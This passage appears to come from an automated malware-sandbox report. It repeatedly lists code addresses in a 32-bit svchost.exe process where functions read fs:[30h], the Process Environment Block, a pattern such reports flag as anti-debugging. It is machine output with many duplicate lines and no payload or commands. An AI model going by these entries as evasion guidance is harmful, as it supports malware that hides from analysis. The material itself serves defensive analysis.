            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C29148 mov eax, dword ptr fs:[00000030h]9_2_03C29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C37152 mov eax, dword ptr fs:[00000030h]9_2_03C37152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2C156 mov eax, dword ptr fs:[00000030h]9_2_03C2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C36154 mov eax, dword ptr fs:[00000030h]9_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C36154 mov eax, dword ptr fs:[00000030h]9_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC9179 mov eax, dword ptr fs:[00000030h]9_2_03CC9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CDA118 mov ecx, dword ptr fs:[00000030h]9_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CDA118 mov eax, dword ptr fs:[00000030h]9_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CDA118 mov eax, dword ptr fs:[00000030h]9_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CDA118 mov eax, dword ptr fs:[00000030h]9_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF0115 mov eax, dword ptr fs:[00000030h]9_2_03CF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C60124 mov eax, dword ptr fs:[00000030h]9_2_03C60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C31131 mov eax, dword ptr fs:[00000030h]9_2_03C31131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C31131 mov eax, dword ptr fs:[00000030h]9_2_03C31131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2B136 mov eax, dword ptr fs:[00000030h]9_2_03C2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2B136 mov eax, dword ptr fs:[00000030h]9_2_03C2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2B136 mov eax, dword ptr fs:[00000030h]9_2_03C2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2B136 mov eax, dword ptr fs:[00000030h]9_2_03C2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov ecx, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov ecx, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov ecx, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov ecx, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D050D9 mov eax, dword ptr fs:[00000030h]9_2_03D050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB20DE mov eax, dword ptr fs:[00000030h]9_2_03CB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C590DB mov eax, dword ptr fs:[00000030h]9_2_03C590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C550E4 mov eax, dword ptr fs:[00000030h]9_2_03C550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C550E4 mov ecx, dword ptr fs:[00000030h]9_2_03C550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]9_2_03C2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C380E9 mov eax, dword ptr fs:[00000030h]9_2_03C380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]9_2_03C2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C720F0 mov ecx, dword ptr fs:[00000030h]9_2_03C720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3208A mov eax, dword ptr fs:[00000030h]9_2_03C3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2D08D mov eax, dword ptr fs:[00000030h]9_2_03C2D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C35096 mov eax, dword ptr fs:[00000030h]9_2_03C35096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5D090 mov eax, dword ptr fs:[00000030h]9_2_03C5D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5D090 mov eax, dword ptr fs:[00000030h]9_2_03C5D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6909C mov eax, dword ptr fs:[00000030h]9_2_03C6909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF60B8 mov eax, dword ptr fs:[00000030h]9_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]9_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C32050 mov eax, dword ptr fs:[00000030h]9_2_03C32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CD705E mov ebx, dword ptr fs:[00000030h]9_2_03CD705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CD705E mov eax, dword ptr fs:[00000030h]9_2_03CD705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5B052 mov eax, dword ptr fs:[00000030h]9_2_03C5B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D05060 mov eax, dword ptr fs:[00000030h]9_2_03D05060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov ecx, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5C073 mov eax, dword ptr fs:[00000030h]9_2_03C5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4E016 mov eax, dword ptr fs:[00000030h]9_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4E016 mov eax, dword ptr fs:[00000030h]9_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4E016 mov eax, dword ptr fs:[00000030h]9_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4E016 mov eax, dword ptr fs:[00000030h]9_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2A020 mov eax, dword ptr fs:[00000030h]9_2_03C2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2C020 mov eax, dword ptr fs:[00000030h]9_2_03C2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF903E mov eax, dword ptr fs:[00000030h]9_2_03CF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF903E mov eax, dword ptr fs:[00000030h]9_2_03CF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF903E mov eax, dword ptr fs:[00000030h]9_2_03CF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF903E mov eax, dword ptr fs:[00000030h]9_2_03CF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]9_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C357C0 mov eax, dword ptr fs:[00000030h]9_2_03C357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C357C0 mov eax, dword ptr fs:[00000030h]9_2_03C357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C357C0 mov eax, dword ptr fs:[00000030h]9_2_03C357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3D7E0 mov ecx, dword ptr fs:[00000030h]9_2_03C3D7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C527ED mov eax, dword ptr fs:[00000030h]9_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C527ED mov eax, dword ptr fs:[00000030h]9_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C527ED mov eax, dword ptr fs:[00000030h]9_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C347FB mov eax, dword ptr fs:[00000030h]9_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C347FB mov eax, dword ptr fs:[00000030h]9_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEF78A mov eax, dword ptr fs:[00000030h]9_2_03CEF78A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB97A9 mov eax, dword ptr fs:[00000030h]9_2_03CB97A9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CBF7AF mov eax, dword ptr fs:[00000030h]9_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CBF7AF mov eax, dword ptr fs:[00000030h]9_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CBF7AF mov eax, dword ptr fs:[00000030h]9_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CBF7AF mov eax, dword ptr fs:[00000030h]9_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CBF7AF mov eax, dword ptr fs:[00000030h]9_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D037B6 mov eax, dword ptr fs:[00000030h]9_2_03D037B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C307AF mov eax, dword ptr fs:[00000030h]9_2_03C307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5D7B0 mov eax, dword ptr fs:[00000030h]9_2_03C5D7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F7BA mov eax, dword ptr fs:[00000030h]9_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F7BA mov eax, dword ptr fs:[00000030h]9_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F7BA mov eax, dword ptr fs:[00000030h]9_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F7BA mov eax, dword ptr fs:[00000030h]9_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F7BA mov eax, dword ptr fs:[00000030h]9_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F7BA mov eax, dword ptr fs:[00000030h]9_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F7BA mov eax, dword ptr fs:[00000030h]9_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F7BA mov eax, dword ptr fs:[00000030h]9_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F7BA mov eax, dword ptr fs:[00000030h]9_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C43740 mov eax, dword ptr fs:[00000030h]9_2_03C43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C43740 mov eax, dword ptr fs:[00000030h]9_2_03C43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C43740 mov eax, dword ptr fs:[00000030h]9_2_03C43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6674D mov esi, dword ptr fs:[00000030h]9_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6674D mov eax, dword ptr fs:[00000030h]9_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6674D mov eax, dword ptr fs:[00000030h]9_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C30750 mov eax, dword ptr fs:[00000030h]9_2_03C30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72750 mov eax, dword ptr fs:[00000030h]9_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72750 mov eax, dword ptr fs:[00000030h]9_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D03749 mov eax, dword ptr fs:[00000030h]9_2_03D03749
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB4755 mov eax, dword ptr fs:[00000030h]9_2_03CB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2B765 mov eax, dword ptr fs:[00000030h]9_2_03C2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2B765 mov eax, dword ptr fs:[00000030h]9_2_03C2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2B765 mov eax, dword ptr fs:[00000030h]9_2_03C2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2B765 mov eax, dword ptr fs:[00000030h]9_2_03C2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C38770 mov eax, dword ptr fs:[00000030h]9_2_03C38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C37703 mov eax, dword ptr fs:[00000030h]9_2_03C37703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C35702 mov eax, dword ptr fs:[00000030h]9_2_03C35702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C35702 mov eax, dword ptr fs:[00000030h]9_2_03C35702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6C700 mov eax, dword ptr fs:[00000030h]9_2_03C6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C30710 mov eax, dword ptr fs:[00000030h]9_2_03C30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C60710 mov eax, dword ptr fs:[00000030h]9_2_03C60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6F71F mov eax, dword ptr fs:[00000030h]9_2_03C6F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6F71F mov eax, dword ptr fs:[00000030h]9_2_03C6F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEF72E mov eax, dword ptr fs:[00000030h]9_2_03CEF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C33720 mov eax, dword ptr fs:[00000030h]9_2_03C33720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4F720 mov eax, dword ptr fs:[00000030h]9_2_03C4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4F720 mov eax, dword ptr fs:[00000030h]9_2_03C4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4F720 mov eax, dword ptr fs:[00000030h]9_2_03C4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF972B mov eax, dword ptr fs:[00000030h]9_2_03CF972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6C720 mov eax, dword ptr fs:[00000030h]9_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6C720 mov eax, dword ptr fs:[00000030h]9_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D0B73C mov eax, dword ptr fs:[00000030h]9_2_03D0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D0B73C mov eax, dword ptr fs:[00000030h]9_2_03D0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D0B73C mov eax, dword ptr fs:[00000030h]9_2_03D0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D0B73C mov eax, dword ptr fs:[00000030h]9_2_03D0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C29730 mov eax, dword ptr fs:[00000030h]9_2_03C29730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C29730 mov eax, dword ptr fs:[00000030h]9_2_03C29730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C65734 mov eax, dword ptr fs:[00000030h]9_2_03C65734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3973A mov eax, dword ptr fs:[00000030h]9_2_03C3973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3973A mov eax, dword ptr fs:[00000030h]9_2_03C3973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6273C mov eax, dword ptr fs:[00000030h]9_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6273C mov ecx, dword ptr fs:[00000030h]9_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6273C mov eax, dword ptr fs:[00000030h]9_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CAC730 mov eax, dword ptr fs:[00000030h]9_2_03CAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]9_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]9_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3B6C0 mov eax, dword ptr fs:[00000030h]9_2_03C3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3B6C0 mov eax, dword ptr fs:[00000030h]9_2_03C3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3B6C0 mov eax, dword ptr fs:[00000030h]9_2_03C3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3B6C0 mov eax, dword ptr fs:[00000030h]9_2_03C3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3B6C0 mov eax, dword ptr fs:[00000030h]9_2_03C3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3B6C0 mov eax, dword ptr fs:[00000030h]9_2_03C3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF16CC mov eax, dword ptr fs:[00000030h]9_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF16CC mov eax, dword ptr fs:[00000030h]9_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF16CC mov eax, dword ptr fs:[00000030h]9_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF16CC mov eax, dword ptr fs:[00000030h]9_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEF6C7 mov eax, dword ptr fs:[00000030h]9_2_03CEF6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C616CF mov eax, dword ptr fs:[00000030h]9_2_03C616CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC36EE mov eax, dword ptr fs:[00000030h]9_2_03CC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC36EE mov eax, dword ptr fs:[00000030h]9_2_03CC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC36EE mov eax, dword ptr fs:[00000030h]9_2_03CC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC36EE mov eax, dword ptr fs:[00000030h]9_2_03CC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC36EE mov eax, dword ptr fs:[00000030h]9_2_03CC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC36EE mov eax, dword ptr fs:[00000030h]9_2_03CC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5D6E0 mov eax, dword ptr fs:[00000030h]9_2_03C5D6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5D6E0 mov eax, dword ptr fs:[00000030h]9_2_03C5D6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C636EF mov eax, dword ptr fs:[00000030h]9_2_03C636EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]9_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]9_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]9_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]9_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB06F1 mov eax, dword ptr fs:[00000030h]9_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB06F1 mov eax, dword ptr fs:[00000030h]9_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CED6F0 mov eax, dword ptr fs:[00000030h]9_2_03CED6F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB368C mov eax, dword ptr fs:[00000030h]9_2_03CB368C
